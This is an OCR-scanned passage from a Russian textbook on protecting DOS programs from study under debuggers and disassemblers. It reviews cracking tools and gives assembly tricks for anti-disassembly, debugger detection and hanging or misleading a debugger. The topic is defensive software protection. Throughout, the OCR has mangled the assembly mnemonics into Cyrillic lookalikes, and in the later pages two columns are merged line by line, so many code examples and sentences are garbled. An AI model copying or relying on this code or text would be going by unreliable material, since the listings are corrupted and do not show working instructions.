В данном разделе рассматриваются чисто программные средства защиты инфорк, . 
ции, надежность которых определяется знанием последних достижений общей теории 
программирования и умением разработчика использовать специальные приемы. 


ЗА. Защита программ от исследования 


Одним из наиболее качественных методов защиты программ является криптографи- 
ческое преобразование информации. Однако исследование подсистемы шифрования под 
отладчиком или дизассемблером позволяет взломщику понять алгоритм криптографиче- 
ской защиты и повторить его. Поэтому шифрование должно применяться совместно 
с защитой от статического и динамического анализа кода программы. Важную роль при 
этом играет стиль программирования. В отличие от общепринятых "наглядности" 
и "структурности", для защитных механизмов следует применять "изощренность ‚те. 
стиль, позволяющий получить сложный и запутанный исполняемый модуль. 


3.1.1. Введение 


В последнее время все чаще раздаются утверждения, что противоотладочные подсисте- 
мы морально устарели, так как хакерский инструментарий-де позволяет пройти любую 
защиту от исследования программного кода. И вообще, неснимаемых защит не существует. 

Действительно, любую систему защиты можно вскрыть за конечное время — это сле” 
дует из того факта, что ее код однозначно интерпретируется процессором. Противник 
может исследовать программу в виртуальной системе, где эмулируются процессор 
память, внешние устройства, операционная среда и т. д. В этой ситуации большинство 
приемов противодействия оказываются неэффективными; однако, какой бы качествен 
ной не была эмуляция среды, все равно последняя отличается от истинной (наприме 
из-за невозможности точной эмуляции временных характеристик аппаратуры, налич 
недокументированных прерываний и т. п.), и защищаемая программа может это расио 
знать со всеми вытекающими отсюда последствиями, 

Можно выделить типичные ошибки разработчиков программных систем защиты: 
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в программа защищается только от средств статического анализа, в результате он 
ко изучается динамически, и наоборот; 

в защита, вскрываемая изменением одного байта, — в момент, когда система за 
сравнивает контрольную информацию с эталонной, простым изменением ком 
перехода она направляется по правильному пути; 

в аналогичная снтуация имеет место, когда результат работы функции, возвращаю 
текущую контрольную информацию, может быть подменен на эталонное (ожидае 
значение (например, с помощью перехвата соответствующего прерывания); 

и после расшифровки системой защиты критичного кода он становится доступен и 


жет быть скопирован в другое место памяти или на диск в момент или вскоре п. 
передачи управления на него. 


Итак неснимаемых защит действительно нет и быть не может, но задачу сделать не 
ходимую для любого отладчика (в сочетании с умным хакером) защиту никто никогда 
ставил. Задача разработчика защит от исследования может состоять в том, чтобы 


Ш либо вынудить противника потратить на снятие защиты в 


ремя, достаточное для | 
нятия контрмер; | 


в либо гарантировать, что ресурсы, потраченные для ее вскрытия, будут сопостав 
с написанием защищенной программы заново. 


Другая группа возражений сводится к тому, нет смысла создавать защиты 
20$, так как якобы РО$ устарела, РО$ умерла. Однако это логика офисного г 
траммиста! Действительно, практически ни в одном офисе под РОЗ уже не раб: 
ют. Но под ней работают программы компьютерных систем ответственного цел. 
го назначения — а в защите от исследования именно они нуждаются в пер 
очередь! От взлома офисной программы пострадает только интеллектуальный ‹ 
ственник, который недополучит сверхприбыль. Взломом программы ответственн 
назначения могут воспользоваться диверсанты или террористы, а это уже грс 
катастрофой. 
Итак, мы пишем программу (или программную подсистему), предназначенную 
етственного целевого применения. Соответственно, мы должны учитывать существ: 
ние вероятного противника, который хотел бы исследовать наш код, 
Для достижения нужных ему целей изменить алгоритм функционирова: 


отв 


чтобы в дальней! 
ния программы. 


3.1.2. Обзор хакерского инструментария 


Для исследования и вскрытия п 


рам 


рограмм хакерами применяются разнообразные п 

мные средства, которые можно разделить на несколько категорий: 

| . 

. отладчики реального режима (те МеРйзю1, Тифо РеБизоег (ТР) и др.): 
отладчики защищенного режима (Зой-Гсе, РебискКег и др.); 

8* 
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ш автоматические дизассемблеры (Зоигсег, Уасот РуваззетЫ ег и др.); 

интерактивные дизассемблеры (РА, О5Рос и др.); 

ш просмотровые программы с встроенным дизассемблированием и ВоЗМможностьк 
изменения кода (Нем и др.); 

распаковщики исполнимого кода (СОРЗ86 и бепепс Тгасет); 

Ш программы для обмана типичных алгоритмов защиты; 

ш различного рода вспомогательные утилиты. 


Наиболее универсальными средствами, которые чаше всего используются для изуче. 
ния кода программы без исходных текстов (для среды РОЗ) являются автоматически 
и интерактивные дизассемблеры (средства статического исследования) и отладчик. 
реального и защищенного режима (средства динамического исследования). Первые пре. 
образуют непонятный машинный код в удобочитаемый текст на языке Ассемблера. Вто- 
рые — информируют обо всех процессах, протекающих в недрах компьютера, после 
выполнения отдельного участка или даже каждой инструкции программы. Наша же за. 
дача, как разработчиков подсистемы обеспечения секретности кода, заключается в том, 
чтобы заставить все эти средства работать неправильно или парализовать их работу. 


Отладчики 

РЕВОС — самый первый отладчик для РОЗ, входивший в комплект ее поставки. Содер- 
жит все уязвимости отладчиков реального режима — обнаружение своего присутствия по по- 
тере прерывания ше 1, использование стека отлаживаемой программы и’т. д. Пользователь 
ский интерфейс крайне убогий, все управление только через командную строку отлалчика. 
В настоящее время не применяется ни для отладки, ни для взлома программ. 

ВоНапа Тибо Рефизсег — один из самых удобных отладчиков с очень развитым поль 
зовательским интерфейсом, но в то же время одна из самых некачественных сред для 
взлома. Обнаруживается по потере ПМТ 1, использует стек отлаживаемой программы, 
аварийно завершается по МТ 0, не давая обработать ошибку деления и т. д. Даже при 
простейшем безусловном переходе в середину длинной команды не может ее корректно 
дизассемблировать при С5: ГР, указывающих на эту команду! 

АЕР — один из первых хороших отладчиков, разработан в 1988 г. Позволяет трассир 
программу по шагам и по подпрограммам, сохранять загружать точки останова, поддержи 
ет макросы. Вполне пригоден для взлома программ, хотя для него и не предназначен. 

|п$1еВЕ — один из самых удобных отладчиков реального режима 20$. Поддерж® 
процессоров до 486 включительно, возможность просматривать 32-разрядные регистры. 
очень удобный (намного удобнее, чем в ТО!) пользовательский интерфейс, сочетающий! 
хорошо продуманное фиксированное расположение окон с удобной системой "горяч 
клавиш и всплывающих меню. Не ловится противоотладочными приемами, оснований" 
ми на "проглатывании" ПМТ 1. Однако у этого отладчика есть и серьезные недостат®* 


овать 
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ие, как использование Й 
такие, стека отлаживаемой программы, зависание по ко 
„невозможность подгрузки оверлейного кода в отлаживаемой манле УТ 
Е у программе. 
мет риа резидентный отладчик для РОЗ. Удобная система "горячих" кл 
всплы пуске программ СОМ или ЕХЕ. Не ловится на потере ПМТ 1 ест 
прерывания точки останова по умолчанию использует ПМТ 458 : с качест 
р то ‚ что делает беспо 
все принудительно добавляемые команды ПМТ 3. Однако содержит как и он 
ошибку, из-за которой неработоспособен на Репнит и выше УТО тонку 
Субегуаге Со4е Г: _ й 
, у к Се ввег встроенный отладчик распаковщика СОРЗ86 Трасси 
пр раму споы ыы ядра этого распаковщика, способного работать в реальном ое , 
ме, име и режиме эмуля на 
и ции процессора. Удобный 
рейс включ . Удобный пользовател 
ит т пючает некоторые специфичные полезные возможности наприме "р 
с ОТ ре на и, уязвим для некоторых специфичных противоотладочных мы 
ос ни архитектуре отладочной подсистемы процессора 386 прок 
— один из ших отладч 
луч иков защищенного ре 
р  ;акеров чт р режима. Разработан хак 
я в ь уже серьезный довод в его пользу. В последних версиях (0. 04 РИ 
ичные и 
ОИ возможности, присущие Зо ТСЕ, и сделано противодействие мн 
р ы тм приемам - в частности, эмуляция выполняемых программой | 
дочными регистрами, что делает бесполезным их "заг " нь 
пользовательский интерфейс. живание. Удобнь 
Зо МСЕ — один и адч 
3 самы 
м ых отладчиков защищенного режима. Поддерживает в 
многие отладчик 
вы). Однако на самом дело ужи лалчи и ставят их только на выполнение кома! 
снованных на потере ПМТ 1 Некооросной противоотладочных приемов, в том чис/ 
ШК всегда выставляет значение УР на2 меньше ня регистров. Загрузи 
ньше, чем нужно. Суще й 
. ственный недостаток 


отладчик не может работа 
рн р ть при загруженном менеджере памяти (ЕММЗ86, ОЕММ и лк 


ТВ - "бо СЕ по-китайски". Раз 


т качестве 
ННО ИН 
ое ядро. Противоотладочными трюками, основанными на потере ТМ 


1, не 
ловится. Нач 
альные значения регистров задает корректно. Нормально уживаетс 


дже ГИ. Сс держит И несколько спе иф Ч | 6 О Н е Н 
мене рами памяти Однако о 5 
Л 
п Ц ичных оаг В, априм р 


работан Лиу Тао Тао на основе идей Зо СЕ, но им. 


Дизассемблеры 
ША 
— на сегодня й 
ть ро ниний день считается лучшим дизассемблером. Позволяет вмешу 
а лирование, переименовыва 
бое ть любые адреса, принудитель 
р некоторые участки как код или данные, расставлять  прекрестны 


пр. По рж ает оольшо. оличество а паратных плат ор расту ее от Мер 
дд: В 
И В п 
м, щ 


жит вс й 
И Добном языке. что р троенный интерпретатор скриптов, написанных на С 
для  асшифрован оляет расширять его возможности (так, существуют скрипт 
ия и даже распаковки "завернутых" файлов). Полный програм тя 
. мный ко 
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и всю информацию о ходе исследования сохраняет в специализированной базе формат. 
1ОВ, сам файл программы не нужен после ее создания. 

215 *Рос — первый интерактивный дизассемблер для РОЗ. Поддерживает процессоры 
от 8086 до 80386 и 32-разрядный код. Позволяет переименовывать адреса, вносить изме. 
нения в дизассемблированный листинг, вносить изменения в программу без перекомпи. 
ляции и т. д. Все изменения дизассемблированного листинга хранит в файле с именем 
исходного выполнимого файла и расширением ЕВГ. Выполнимый файл необходим для 
дальнейшей работы. . 

Зонтгсег — лучший автоматический дизассемблер. Поддерживает многие компиляторы 
с языка Ассемблера. Содержит много предварительных настроек. Отлично находит пе. 
рекрестные ссылки. Очень полезное свойство — выдает в конце листинга сводку исполь. 
зованных программой прерываний и портов ввода/вывода. 


Программы просмотра 

Хакерские программы просмотра предоставляют многие возможности интерактив- 
ных дизассемблеров, но при этом для них не характерна длительная обработка исполни- 
мой программы (дизассемблируется маленький фрагмент кода, загруженный в буфер 
оперативной памяти). 

НТЕ\М/ — наиболее известная хакерская просмотровая программа. На момент написа 
ния этого обзора последняя известная версия — 6.55. 

Основные возможности программы НЕУ/: 
Ш просмотр двоичных файлов в текстовом, шестнадцатичном и дизассемблернох 

(встроенный дизассемблер/ассемблер до Репбит ГУвключительно) режимах; 
редактирование двоичных файлов в шестнадцатеричном и дизассемблерном режимах, 
Ш поиск в двоичном файле последовательности байт как с различением регистра бук 

так и без такового, 
поиск ассемблерных команд по шаблону; 
ш поиск и замена последовательностей байт; 


ш выделение блоков и манипуляции с ними — копирование в файл или из файла, запо.` 


нение ит. д.; 
Ш редактирование битов в байте, слове или двойном слове по текущему смещению в файле 
№ встроенная подсистема шифрования кода командой ХОК по постоянному клю' 
длиной до 20 байт; 
я встроенная универсальная криптоподсистема с определением криптоалгоритма пог: 
зователем на уровне ассемблерных команд; 


ш динамическое изменение базового адреса при просмотре (по умолчанию 0); 
в просмотр и редактирование заголовков исполнимых файлов различных типов И 7. А 
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Хакерские вьюверы обычно применяются для изменения кода ломаемой программ 

после ее исследования под отладчиком или исследования  Дзассемблированной п . 
аммы. Они годны и для полного исследования программ, особенно простых п ыы 

или их небольших фрагментов. | ротриим 

О\У1е\ — еще одна хакерская программа просмотра. Во многом повторяет возмо 

ий НЕМ. Также удобный пользовательский интерфейс. Дизассемблер 486-й лее 

поздних версий автору не попадалось. | р СР более 
ВТЕ\ — многоплатформенная хакерская программа просмотра. Понимает значите 

но больше форматов выполнимых файлов, чем НТЕЖ, особенно под УМХ (от а о ДЬ 

всех или почти всех разновидностей ЕТЕ). Недостаток: для человека, п ивы то 

к НЕМ или О\У!е\, раскладка клавиш непривычна и неудобна. рИиОто 


Автоматические распаковщики 


Программы автоматической распаковки предназначены для "сдирания" с исполнимог 

файла запаковщика, пристыковочной защиты и т. д. Они перехватывают ПМТ | или  перыва. 
ние таймера и отслеживают наступление того или иного события (первый вызов прерывания 
$ 1Р принимают заданное значение, найдена заданная последовательность байт по адрес 
С$: ТР ит. д.). Такие программы предназначены для "раздевания" программ с  истыковоч, 
ным модулем. Кроме того, существуют более простые распаковщики, которые отслеживают 
последовал он для конкретных защит/запаковщиков и умеют распаковывать только 
оне возмож ивать смену регистра С5, и после заданного количества таких 

тает , ы имеем в памяти распакованный исполнимый файл. 

т Е снимает с образа этого файла дамп (точнее, два дампа — из-за особенно- 
СУТ файла) и по этим дампам генерирует код распакованной программы. 
ны поовершенные на сегодня распаковщики — это, безусловно, СОР3З86 3.5 
ом ен .9, позволяющие распаковать практически любой запакованный файл 

циально защищенного от них). Кроме того, есть несколько хороших распаков- 


щиков, рассчитанных на борьб 
у с конкретными [6 _ 
1.30, УМОСЕХЕ 1.4, Х-ТВАСТ 1.51 ит.д. программами — МР 411, ТВОМ 120 


Вспомогательные хакерские утилиты 

К 
в «Роме вышеперечисленных средств, хакеры используют для взлома программ разно- 
к Рода вспомогательные утилиты. Некоторые их разновидности: 

программы протоколирования прерываний/операций с файлами.... ; 


пр 


драмы просмотра/редактирования оперативной памяти; 
аммы 
тр т просмотра/редактирования системных структур данных в оперативной памяти; 


$6) 
ых паммы автоматического определения по исполнимому файлу использованных при 
оздании компилятора/запаковщика/пристыковочной защиты. 
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3.1.3. Борьба с автоматическими 


и интерактивными дизассемблерами 


Автоматические дизассемблеры анализируют код исполнимого файла и формируют 
соответствующий ему исходный текст или листинг. Статический анализ кода може 
свести на нет все усилия по созданию противотрассировочной подсистемы. Просмотрев 
дизассемблированный текст программы, можно найти и обойти все механизмы защиты 
от отладки. Поэтому необходима реализация подсистемы защиты программы от дизас. 
семблирования. 

Защититься от статического исследования программы можно либо модификацией кода 
самой программой, зашифрованием кода (с пристыковкой расшифровывающего модуля), 
запаковкой кода, либо различными ассемблерными трюками, направленными на искажение 
выходного кода дизассемблера: 

# скрытыми командами передачи управления (переходы по динамически изменяемым 
адресам, УМР через ВЕТ, ВЕТ и САЦ, через /МР), усложняющими построения дизас- 
семблером графа передачи управления; 

перекрывающимся кодом; 

Ш нестандартным форматом загружаемого модуля, например, определением стека 
в сегменте кода ит. п. 


Возможны также различные комбинации этих способов. 
Для начала два примера перекрывающегося кода. 

















;===== Пример 3.1. ======== ЕЕНЕЕЕЕЕНЕНЕНЕЕНЕЕНЯ=== 
Н1адеп р: 
поУ ах, О?ЕВЬ ; О2ЕВЬ - КОП пр $+2 
Эр $-2 
№хЕ: ... ; Продолжение 
у===== Пример 3.2. ====ЕЕЕЕЕЕЕЕНЕНЕНЕЕЕЕНЕЕЕНЕЕЕН== = 
пох ах, ОЕЕОЗВ 
пр $—2 ; Переход на О5н РЕВ ЕВЬ, т.е. на 
; команду аЯЯ ах, ОЕВЕЕВ, за которой 
; последуют с19 и а@Я ан, ЗВЬ 
ада ав, ОЗВЬ ; АХ = 2503. 


Реальное значение АХ будет неизвестно до тех пор, пока не будет помещено в ре’ 
гистр. И этот факт можно в дальнейшем использовать. р 

Принципы работы пристыковочных защит, основанных на зашифровании кода, был 
рассмотрены в главе 1. Здесь же сосредоточимся на приемах, искажающих на вы 
дизассемблированный код. с 

Простейшим способом запутывания кода является его запутывание с помощью безу 
ловных переходов. После команды перехода на скрываемую команду ставится неско 


ход 


лько 
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осмысленно выглядящих команд и код операции и/или префикс команды, имеюще 
большой размер в байтах. Длина в каждом конкретном случае подбирается с таким рас 
четом, чтобы конец этой фиктивной команды попал в середину одной из настоящих. Эт 

иводит к тому, что дизассемблер, начиная с этой команды, выдает неверную последо- 
вательность команд, а нередко и вообще не может ничего декодировать и только пишет 
последовательность директив объявления данных (РВ, О\,, ...). Кроме того, хорошие 
отладчики (шейеь Ребскег, Ме Изо, ТВ и пр.) показывают в окне кода такую же 
неверную последовательность команд до тех пор, пока команда перехода не будет вы. 
полнена, а некачественные (Мтсгозой Реби?, Мтсгозой Соде\ем, Тшфо РеБизоег ит. п.) 
не отображают правильной команды даже после выполнения команды ]МР (в момент 
когда СЪ: ГР хранят адрес команды). | 

Итак, пример обмана дизассемблера за счет скрытия ассемблерной команды в более 


длинной (а на самом деле ее КОП обходится). При этом для обхода засоряющих байтов 
используется команда безусловного перехода. 


уя==я== Пример 3.3. =======Ененяняянен=нн=нненныненькакь 
пр Н1ааеп 
поу ах, 3000 
116 218 
ОВ ОЕАВ } КОП дальнего перехода 
Н194ел 
поу Ьх, ОГЕЗЕТ Ве1порерцддед 


Начиная со смещения, помеченного как Н!9деп, дизассемблер выдаст либо непра- 
вильную последовательность команд, либо серию директив ОВ. Способ очень легко реа- 
лизуется, однако и понять, в чем тут дело, относительно просто. 

Более эффективна и более компактна вариация этого способа, при которой для скры- 


Тия защищаемой команды применяется условный переход по заведомо истинному усло- 


в .. 
ию. Однако истинность этого условия не должна быть "понятной" для компилятора, 


атем более дизассемблера. Преимуществом этого способа является и то, что он не тре- 
б 
ует внесения дополнительных, никогда не выполняемых команд в текст программы. 


Этот способ может быть и неплохим противоотладочным приемом — одновременно сби- 
вать с толку и дизассемблер и отладчик. 


И35=== Пример 3.4. === 
оу ах, Ве!1паериадеа 
ср . ах, 0 
)е №Могта] Вип 

\ ОВ ОЕАВ 

“ОТта] Вил: 








ИИ 
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Дизассемблер не понимает, что условие заведомо истинно, а "дальний пере) 
сфабрикованный нами, никогда управления не получит. Поэтому он добросове 
дизассемблирует несуществующую цепь команд. 

Интерактивные дизассемблеры формируют исходный текст/листинг по выполнимо 
коду программы так же, как это делают автоматические дизассемблеры. Однако интерак. 
тивные дизассемблеры отличаются от автоматических наличием мощного пользователь. 
ского интерфейса, который сильно облегчает анализ дизассемблированной программы. 

Интерактивные дизассемблеры, как правило, позволяют: 

ш менять имена переменных, меток, подпрограмм и т. д., вводить имена для новы, 
адресов, удалять имеющиеся метки/имена; 

ш искать последовательности символов в результирующем тексте и последовательност 
байт в исполнимом коде, 

и повторно дизассемблировать участки кода в последовательность ассемблерны 
команд или директив ОВ; 

№ задавать комментарии к подпрограммам, прерываниям и т. д., которые автоматическ: 
расставляются около всех соответствующих вызовов; 

Ш просматривать перечень сегментов программы; 

Ш редактировать дизассемблированный текст с автоматической модификацией испо-- 
нимого кода или без таковой. 


Различные интерактивные дизассемблеры предоставляют также и иные возможност 
Самые совершенные интерактивные дизассемблеры (РА) позволяют не только меня: 
уже дизассемблированный код, но и вмешиваться в сам процесс дизассемблирования. 

Вышеописанные способы хороши против автоматических дизассемблеров. Однако 
запутать ТРА (или любой другой интерактивный дизассемблер) только с их помощью не 
удастся. Точнее, удастся, но лишь до того момента, пока наш противник не сообразит 
принудительно обозначить засоряющие байты как Опаейпед’, а все после них — как кой. 
Сразу же после этого он получит возможность анализа защищаемой программы в среде 
дизассемблера. 

Против этого существует сложный, но эффективный прием, получивший на хакер 
ском жаргоне название "динамический фуфель". Суть приема заключается в том, ч® 
засоряющие байты никак не обходятся командами передачи управления. Они замешаю" 
ся безобидными командами (МОР, ЗТР и пр.) уже в ходе выполнения программы, во 
заведомо до первого запуска подпрограмм, содержащих эти "фуфели". Другими словами, 
защищаемый от дизассемблирования фрагмент программы действительно не может быть 
запущен в том виде, в каком программа находится на диске — скорее всего, это привеле! 

к зависанию компьютера. Однако, запустившись, программа считывает откуда-то да" 
ные, необходимые для устранения засоряющих байтов, и замещает их на команды, НИК 
не влияющие на ход выполнения программы. 
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Взлом программы, которую защитили таким способом — длительный и трудоемкий 
промесс, даже если данные для "дефуфелизации" содержатся в коде самой программы 
Можно и еще усложнить взлом, сохраняя эти данные на нулевой дорожке или в мыш 
тенно оставляемом "зазоре" между разделами дисковой подсистемы. В данном с . 
само по себе копирование секретной программы ничего противнику не даст - он потеря. 
ет данные, необходимые для ее преобразования к нормально работающему  остянию 


3.1.4. — Защита от отладчиков реального режима 
Защититься от исследования под отладчиком можно двумя путями: 


в тем или иным способом обнаружить отладчик и передать управление на некоторую 
ветку реакции на отладчик; 


" " 
загрязнить программ 
Г] гр. рогр у фрагментами кода, которые нормально выполняются без 


отладчика, но под отладчиком приводят к аварийному завершению, зависанию 
компьютера или искажению хода выполнения программы 


3.1.4.1. Обнаружение отладчика | 


Отладчики реального режима достаточно просто обнаружить. Можно выделить две 

основные группы методов их обнаружения: 
и я аппаратных особенностей процессора, в частности наличие очереди 
нд, а также потеря трассировочного прерывания после выполнения некоторых 


инструкций, например инструкций 
изменения содержимого сегментных 
командам МОУ или РОР); ретиСтров по 


ВЫЯВЛ. Й Й 
и, изменений операционной среды путем проверки векторов прерываний 
ы 
р р и времени выполнения отдельных участков программы, проверки начальных 
остояний регистров при запуске программы ит. п. 


аки используют такие ресурсы компьютера, как отладочные прерывания ПМТ 1 
ии И р Ну ие или прерывание пошаговой работы), ПМТ 3 (прерывание 
а и аг трассировки ТЕ. Все это может применяться для обнаруже- 
и пол КИМ отладчиком защищаемой программы. Дело в том, что про- 

х теряют" трассировку одной команды, если предыдущая команда 


изменяла 
асе значение сегментного регистра. Поэтому можно обнаружить установку флага 
ировки ТЕ в процессе отладки, например так. 


'т9=== Пример 3.5. ======ЕЕНЕНЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ=Е 
ета ах, 55 
ризЬ ах 
рор $5 
раз НЕ 
рор ах 


разВЕ 








№ д 
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рор Ьх 
$9 ах, Бх 
оу Ьх, ОГЕЗЕТ Ве1пабераддеа 
ее [Ъх), ах 


Вариацией этого метода является "ловля" отладчика на командах (префиксах) переу . 
тановки сегмента. 


;===== Пример 3.6. =Е===========ЕНЕНЕЕЕНЕЕЕЕНЕЕНЕЕЕЕЕЕЕ 
с$: 
разВЕ 
рор ах 
раз ВЕ 
рор Ьх 
$4 ах, БХ | 
поу Ьх, ОРРУЕТ 'Ве1паребоадед 
поу [Ъх], ах 





При пошаговой трассировке данных фрагментов, например, в среде ТР переменне: 
ВештереБиеее4 присвоится значение 1001. Однако этот способ не гарантирует 100%-й вер. 
ятности обнаружения отладчика, так как фрагмент может быть пройден не по шагам, а сра; 
(команда Со ю сшзог / Е4 или Зер оуег / Е8). Кроме того, хорошие отладчики реального | 
жима (например, шей 1.01) прерывание ПМТ 1 не используют — т. е. способ не работа ` 
ас некоторыми очень плохими отладчиками (например, ММО 1.00) он тоже не проходит, 1. 
как они используют ПМТ 1, но не сбрасывают флаг ТЕ вообще! Поэтому нужно применя” 
и другие способы обнаружения отладчиков реального режима. 

Самый очевидный из них — проверка байта, находящегося по вектору прерывания [М1 
(можно и ПМТ 1, но это менее надежно, так как хорошие отладчики реального режима, г. 
пример, 1а1еть ПМТ 1 вообще не перехватывают). Вектор лучше получать непосредстве- 
но из таблицы векторов прерываний, а не вызовом функции 35Н прерывания ПМТ 211. 


у===== Пример 3,7. ===================Е==+==ЕЕЕЕЕЕЕНЕЕЕЯ 
хог ах, ах 
поу ез, ах 
поу Ьх, ОСВ 
хо ап, ав 
поу 91, ВУТЕ РТВ ез;: [5х] 
оу Ьх, ОРЕЗЕТ Ве1пабериддея 
поу ах, [0х] и 
за 91, ОСЕР ; Код команды 1гес 
ааа ах, Ах 
поу [5х], ах 


и 

После выполнения этого фрагмента под отладчиком реального режима (даже таки 

. . ё. 

хорошим, как ш$12ВИ) переменная ВетеПеБизсей будет иметь ненулевое значений 


—_ррдрзк__тЫгд,г,ДштштммяшмымымынвннвннннннннннънъЪнЪъньюьнё‘3н9нын—вньнннии 
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Теперь в любом месте программы можно сравнить значение с нулем и, если не равно, 
реагировать на отладчик. 

Следующий способ обнаружения отлалчиков реального режима основан на реализа- 
ции в последних механизма точек останова по ПМТ 3. Когда в таком отладчике ставят 
точку останова, байт по этому адресу замещается на однобайтовую команду ПМТ 3 (КОП' 
_ ССВ). Соответственно программа может обнаружить эти команды, взвести флаг обна- 
ружения отладчика (в наших примерах — Ветеебигеед) и среагировать на отладчик по 
проверке этого флага. Способов обнаружения этих команд (и вообще искажения кода, 
так как есть отладчики, ставящие вместо ПМТ 3 вызов другого прерывания -— например, 
Мей зюЕ!) можно придумать много — начиная с поиска байта ОССЬ командой ЗСАЗВ 
и кончая вычислением различных контрольных кодов целостности с защищаемым кус- 
ком кода в качестве аргумента. 

На процессорах семейства 486 возможно обнаружить отладчик, используя буфер 
предвыборки команд. Изменение кода команды, которая уже выбрана и находится в этой 
очереди, никак не повлияет на ход выполнения программы. Под отладчиком же очередь 
предвыборки постоянно сбрасывается, и выполнится измененная команда. 


у===== Пример 3.8. ======я=е==неняняЕнаненененаныаеыыае 

оу ВУТЕ РТВ Сг1г1са1, ОЕ 

; Код операции $6с 

(г11са1: 

с1с 

Эс . №огта] 

поу рх, ОЕРРЗЕТ Ве1парерзадея 

поу [Ъх], 1 
№тпа] ; ; Нормальное 


; выполнение программы 


Первая команда этого примера никак не повлияет на нормальное выполнение программы, 
так как пересылка выполняется в оперативную память, а команды уже находятся в буфере 
предвыборки. Под отладчиком же выполнится измененный код, и флаг отладки будет взведен. 
Однако нужно помнить, что этот способ годен лишь на вспомогательные роли, так как даже 
сли программа будет выполняться на встраиваемой машине с аналогом 486-го процессора, 
исследовать ее, по всей вероятности, будут на Репнит. А там конвейеризация реализована 
иначе, и буфера предвыборки нет. 

Следующий способ обнаружения отладчика применим только против некачественных 
ОТладчиков, таких, как Соде\1е\ или Тифо Оефиоег. Он основан на том, что при загрузке 
Программы определенным образом инициализуются регистры. При этом в регистр СХ 
заносится ненулевое значение — в СОМ-программах это длина СОМ-файла, а в ЕХЕ- 
Программах — размер кода в оперативной памяти. Регистр О устанавливается равным 
еб чем значение $Р не равно нулю. Исследование же программы под отладчиком 
я ует неоднократных прогонов. Соде\У1е\ и ТО при первом прогоне программы обну- 

т регистры АХ, ВХ, СХ, ОХ, $1, РЬ ВР. При повторном прогоне программы 





ООО 


ИЕ: 
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` 
Соде\1е\ опять обнуляет эти регистры, а Тибо Рефиосег вообще не трогает мусхе. Начнем с использования флага обнаружения отладчика (точнее говоря, переменн 
оставшийся после предыдущего прогона. Сравнивая в начале программы Значен | статуса этого обнаружения — она вовсе не обязана содержать лишь 2 а Начония _-0 ви 

регистров с требуемыми, можно обнаружить отладчик (например, по условию СХ =, для искажения выполнения программы. 
или 21 <> ЗР) и взвести флаг обнаружения или сразу же перейти на ветку реакции в. „зкте Пример 3.10. эееяннненякнияныяееннынннянн=-==== 
отладчик. Против отладчиков высокого качества исполнения (шзэвь РебсКег и пр.) то ах, Ве1паребиадея 

$ ах, 3 


| данный прием бесполезен. 
| 


Наконец, рассмотрим метод обнаружения отладчика, основанный на поиске точки ризь ах ° | 
| останова. Е Ы ИИ 
| .===== Пример 3 . 3 . ЕЕЕЕЫЕЕЕЕЕЕРЕЕЕЕЕЕЯЕЫ ЕЕЕЕЕЕЕНЕСЕЕЕЕЕ= — о итеяаняя 
| са11 — МуРгос ни не обнаружен (ВетёПебизвеа = 0), выполняется возвраг на следующую 
| р в , за ВЕТМ команду. Если же ВешеПебиззе4 <> 0, то выполняется переход на команду 
| уРхос; ор м | по смещению С$: АХ, где АХ — это преобразованное значение ВетеПеБиезе4. При этом 
‚М ак прав .. 
| ИВ ъх мы, как правило, попадаем в середину некоторой последовательности команд или даже 
| ОЙ стр [6х], 0ССВ ; Проверка после вызова МуРхос В середину многобайтной команды, что приводит обычно к повисанию РОЗ и невозможно- 
| 92 реба9 сти дальнейшей работы. 
‹ .. 
ие аетитоеаетенеинияе сле щий способ исказить выполнение программы под отладчиком — прибавлять 
' " значение переменной ВешеПРеБиоре4 к смещению в 
егистре при ко 
программ. регистре при косвенных вызовах 
3.1.4.2. Искажение работы программы под отладчиком рнеЕЕ=Е Пример 3.11. неее 
реального режима ОУ Ьх, ОРРЗЕТ Зесгесвоис1пте 
поУ ах, Ве! 
Все способы, описанные в 3.1.3.1, вполне применимы для реальных защит, но У них гох ах, д еооея 
! 

















есть существенный недостаток: можно вообще не разбираться, как программа определя- 
ет факт работы под отладчиком! Противнику достаточно найти команду перехода на вет- 
ку реакции на отладчик — и все наши ухишрения становятся бесполезными. Поэтому 





в реальных защитах их нужно дополнять трюками, искажающими работу программы без Как видим, если отладчик не обнаружен, засекреченная подпрограмма нор 
В мальнс 
явных проверок. ызовется. Если же его засекли, то смещение будет искажено, и это, по всей вероятности 
Можно выделить следующие методы искажения хода выполнения программы пол приведет к повисанию РОЗ. 
отладчиком: Можно подменять вектора отладочных прерываний (ПМТ 1, ПМТ 3). Здесь открывается 


И фантазии разработчика — можно поменять их местами, заместить 
о торах ы и или любой другой вектор, сдвигать сегмент или смещение 
мы к ах, мод цировать код обработчика и т. д. Попытка трассировки про- 
с ь рестановках опять же приводит к повисанию отладчика или РОЗ, 
ледующий способ — блокировать видеоподсистему. 


Ш противодействие установке контрольных точек и изменению кода программы, н" 
пример периодической проверкой контрольных сумм различных участков програм 
мы, чередованием команд запрета и разрешения прерываний ит. п. ; 

ш нарушение интерфейса с пользователем, например путем блокировки клавиатуры" 
искажения вывода на экран ит. п.; 

И р али Пример 3.12. =============нЕнсеняненеенекаенннЕ== 

№ использование отладочных прерываний (а иногда и не только отладочных!) для ре ПОСЛЕ ОЕ Нос а 

ве НЫ ейс я как генера астков кода. шиф вание вызов оследовательность ассемблерных команд, == 

зации таких ответственных действий, генерация уч. да, р , === приводяцая к повисанию любого отладчика. зоо 
других подпрограмм системы защиты; ах, 1201. 

№ определение стека в области исполняемого кода и неоднократная его смена. 








| ‚ожно использовать за щение раооты с клавиа ой 
запрещение р тс турои. 
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сазоии оо вов ооо ва вали пр ааа зав ав ь вечна нано сочи оц пана нано в вая овно вар оо нло оно и иво бари ооо вне но ваньь 


у=ЕЕЕЕ Пример 3.13. ====Е=ЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕВЕЕЕНЕЕНЕЕЕЕЕЕ 
(ее а1, ОАБЬ 
оц 641, а1 





Наконец, можно использовать вызовы ПМТ 1 и ПМТ 3, но не там, где их обычно ищут 
а, например, в прерывании от таймера, и с активацией ветки не сразу, а после некоторо: 
временной задержки. Очевидно, этот способ конфликтует с перестановкой векторов ил,. 
замещением обработчиков, и применять их можно только поочередно. 

Комбинируя описанные методы, можно построить достаточно надежную систему защиты. 


3.1.5. 


Некоторые отладчики защищенного режима ловятся на противоотладочные трюки, 
предназначенные для борьбы с отладчиками реального режима. Так, Зой-се попадается 
на приемы, связанные с потерей одного трассировочного прерывания после префиксной 
команды С$: (КОП 2Е\). 


С5; 


